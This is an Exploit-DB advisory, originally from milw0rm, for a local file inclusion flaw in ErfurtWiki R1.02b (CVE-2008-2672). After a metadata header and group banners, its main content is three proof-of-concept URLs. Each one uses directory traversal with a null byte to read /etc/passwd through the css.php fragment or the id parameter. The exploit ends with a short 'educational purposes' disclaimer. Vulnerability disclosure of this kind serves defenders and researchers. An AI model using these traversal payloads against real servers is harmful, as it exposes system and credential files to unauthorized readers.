ErfurtWiki R1.02b - Local File Inclusion

Author: Unohope
type: webapps
platform: php
port: 
date_added: 2008-06-09  
date_updated: 2016-12-07  
verified: 1  
codes: OSVDB-46325;CVE-2008-2672;OSVDB-46324  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comewiki-R1.02b.tgz  

raw file: 5771.txt  
  _____ _   _ _____  _____ _____ _____
 /  ___| |_| |  _  \|  _  |  _  |_   _|
 | (___|  _  | [_)_/| (_) | (_) | | |
 \_____|_| |_|_| |_||_____|_____| |_|
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- -
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerability

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: ErfurtWiki

Download ====:: http://erfurtwiki.sourceforge.net/downloads/ewiki-R1.02b.tgz

Mirror ======:: http://www.badongo.com/file/9611291

______________________
[Local File Inclusion]

- {css.php} -

http://localhost/ewiki/fragments/css.php?ewiki_id=../../../../../../../../etc/passwd%00&ewiki_action=1

http://localhost/ewiki/?id=../../../../../../../../../../../../etc/passwd%00

http://localhost/ewiki/fragments/css.php?ewiki_id=1&ewiki_action=../../../../../../../../etc/passwd%00

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]